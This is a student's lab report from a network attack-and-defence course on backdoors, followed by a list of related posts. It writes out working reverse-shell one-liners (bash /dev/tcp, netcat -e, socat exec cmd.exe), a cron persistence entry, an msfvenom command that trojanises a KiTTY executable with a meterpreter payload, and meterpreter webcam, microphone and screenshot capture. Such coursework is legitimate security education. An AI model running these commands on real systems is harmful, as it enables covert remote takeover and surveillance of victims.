2017-2018-2 《网络对抗技术》 20155322 第五周 Exp2 后门原理与实践
2017-2018-2 《网络对抗技术》 20155322 第五周 Exp2 后门原理与实践
[博客目录]
1-实践目标
1.1-实践介绍
学习内容:
- 使用nc实现win,mac,Linux间的后门连接
- meterpreter的应用
- MSF POST 模块的应用
学习目标:
建立一个后门连接是如此的简单,功能又如此强大。通过亲手实践并了解这一事实,从而提高自己的安全意识 。
1.2-实践内容
- 使用netcat获取主机操作Shell,cron启动 (0.5分)
- 使用socat获取主机操作Shell, 任务计划启动 (0.5分)
- 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
- 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
- 可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。
1.3-实践要求
基础问题回答
- 例举你能想到的一个后门进入到你系统中的可能方式?
- 例举你知道的后门如何启动起来(win及linux)的方式?
- Meterpreter有哪些给你映像深刻的功能?
- 如何发现自己有系统有没有被安装后门?
实验总结与体会
实践过程记录
报告评分 1.5分
- 报告整体观感 0.5分
- 报告格式范围,版面整洁 加0.5。
- 报告排版混乱,加0分。
文字表述 1分
- 报告文字内容非常全面,表述清晰准确 加1分。
- 报告逻辑清楚,比较简要地介绍了自己的操作目标与过程 加0.5分。
- 报告逻辑混乱表述不清或文字有明显抄袭可能 加0分
2-实践过程
2.1 使用nc实现mac,Linux间的后门连接
- Mac获取Linux Shell
首先主控端/服务端MAC运行指令如下,8888是nc监听的端口号,然后运行:bash -i >& /dev/tcp/192.168.3.59/8888 0>&1,失败,再试nc 192.168.3.59 8888 -e /bin/sh

发现并没有什么用……失败

- Linux获取Mac Shell
首先获取Linux的ip:ifconfig,然后监听nc -l -p 8888,Mac方面进行连接:bash -i >& /dev/tcp/192.168.20.154/8888 0>&1

这时我们发现Linux终端上显示了MAC的命令提示符:

2.2 使用netcat获取主机操作Shell
使用netcat获取主机操作Shell,cron启动
- 在Windows系统下监听5217端口ncat.exe -l -p 5217
- 在Kali中用
crontab -e编辑一条定时任务:
使用vim,直接在最下面一行加入25 * * * * /bin/netcat 192.168.196.136 5322 -e /bin/sh

2.3 3使用socat获取主机操作Shell
使用socat获取主机操作Shell, 任务计划启动
- 首先在Windows系统中找到“计划任务”


- 创建基本任务>一次>启动程序socat.exe>参数输入:
tcp-listen:5322 exec:cmd.exe,pty,stderr(两个参数之间用空格或者;)

- 启动任务,并在Kali中输入
socat - tcp:windowsIP:端口


然后就会发现获得了win的操作shell
2.4 meterpreter的应用
我的电脑系统是Mac,老师教程给的是Windows+Linux的例子,因为15年的渣渣Air开两个虚拟机会凉凉(别问我为什么……),争分夺秒,度秒如年……
首先选择一个windows可执行文件,执行如下指令:
msfvenom -p windows/meterpreter/reverse_tcp -x ./KiTTYPortable.exe -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=192.168.20.136 LPORT=443 -f exe > KiTTy_backdoor.exe
生成的文件复制到windows中。

打开msfconsole:输入以下指令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.196.140
set LPORT 4444 //这里不知道为啥变成4444了
show options
exploit
- 在Windows平台上运行可执行文件,Linux平台的监听进程将获得Win主机的主动连接,并得到远程控制shell:

2.5 Meterpreter常用功能
使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
- 获取Windows命令行界面,以方便执行Windows内置功能指令,exit退出。

- 获取ruby交互界面,exit退出
- 进程和和迁移

这里出现timeout,超时了,只能再运行一下后门了。
…… - 接下来我们试试提音频:
record_mic

- 接下来是看看摄像头:
webcam_snap

- 看看截图?
screenshot

- 还有其他的很多操作,可以通过
help指令来了解

2.6 基础问题回答
- 例举你能想到的一个后门进入到你系统中的可能方式?
答:可能通过网站挂马的方式,让用户加载网页的时候下载到用户的电脑上。 - 例举你知道的后门如何启动起来(win及linux)的方式?
答:Linux发送后门到Windows上,Windows可以只要运行就能启动后门 - Meterpreter有哪些给你映像深刻的功能?
答:截屏,拍照,录音…… - 如何发现自己有系统有没有被安装后门?
答:这个看经验吧,主要是得注意上网,不要乱点链接,不要插陌生U盘等等……
3-实验感想&参考资料
实验感想:非常有趣的实验,基本上是满足了我对于黑客的幻想(获取远程控制shell和摄像头O(∩_∩)O),总之感觉很棒,希望能在将来学到更多东西!
2017-2018-2 《网络对抗技术》 20155322 第五周 Exp2 后门原理与实践的更多相关文章
- 2017-2018-2 20155228 《网络对抗技术》 实验五:MSF基础应用
2017-2018-2 20155228 <网络对抗技术> 实验五:MSF基础应用 1. 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需 ...
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践 后门的基本概念及基础问题回答 常用后门工具 netcat Win获得Linux Shell Linux获得Win Sh ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
- 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...
- 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...
随机推荐
- Vue2学习笔记:v-show指令
v-show指令:v-show="true/false" 控制元素显示/隐藏 1.使用 <!DOCTYPE html> <html> <head> ...
- 关于easyUI一些标签的使用
①table: 1.class="easyui-datagrid":指定为easyUI的表格布局 2.pagination="true":带分页的表格 3.ro ...
- CVE-2013-2551漏洞成因与利用分析(ISCC2014 PWN6)
CVE-2013-2551漏洞成因与利用分析 1. 简介 VUPEN在Pwn2Own2013上利用此漏洞攻破了Win8+IE10,5月22日VUPEN在其博客上公布了漏洞的细节.它是一个ORG数组整数 ...
- php实现session入库
为什么要把session存入数据库?有什么用? 可以:统计在线人数,现实多站点session共享(通行证),控制同个账号登入人数等. 要实现session的入库,有关键的几个基本知识: session ...
- C# 所有特性,特性所在命名空间,那些命名空间拥有特性类
文章持续补充中 特性并不是集中在某一命名空间中,而是不同的特性在不同的命名空间下,特性是某一命名空间下提供的语法糖. 有哪些命名空间提供特性: 命名空间 描述 Microsoft.Build.Fram ...
- November 15th 2016 Week 47th Tuesday
Success is finding satisfaction in giving a little more than you take. 成功就是付出比得到多,仍然心满意足. Can I find ...
- Civil War
Civil War 编辑 <Civil War>是美国硬摇滚乐队枪炮与玫瑰的一首单曲,首次收录于1990年的群星慈善专辑<Nobody's Child: Romanian Angel ...
- 多线程操作C++ STL vector出现概率coredump问题及尽量避免锁的双缓冲队列
多线程操作全局变量,必须考虑同步问题,否则可能出现数据不一致, 甚至触发coredump. 前段时间, 遇到一个多线程操作了全局的vector的问题, 程序崩了.场景是这样的:某全局配置参数保存在一 ...
- 动态代理与HOOK(与oc isa 替换)
HOOK:面向函数,解决函数调用拦截与替换的问题: 动态代理:面向对象,解决对象的动态替换问题: 动态代理的实现方案: 1.经典代理机制: 2.子类化机制:oc语言的isa替换是这额解决方案的经典案例 ...
- leetcode第一刷_N-Queens
八皇后问题应该是回溯法的教学典范.在本科的时候,有一门课叫面向对象.最后的附录有这个问题的源码.当时根本不懂编程,照抄下来,执行一下出了结果都非常开心,哎. 皇后们的限制条件是不能同行同列,也不能同对 ...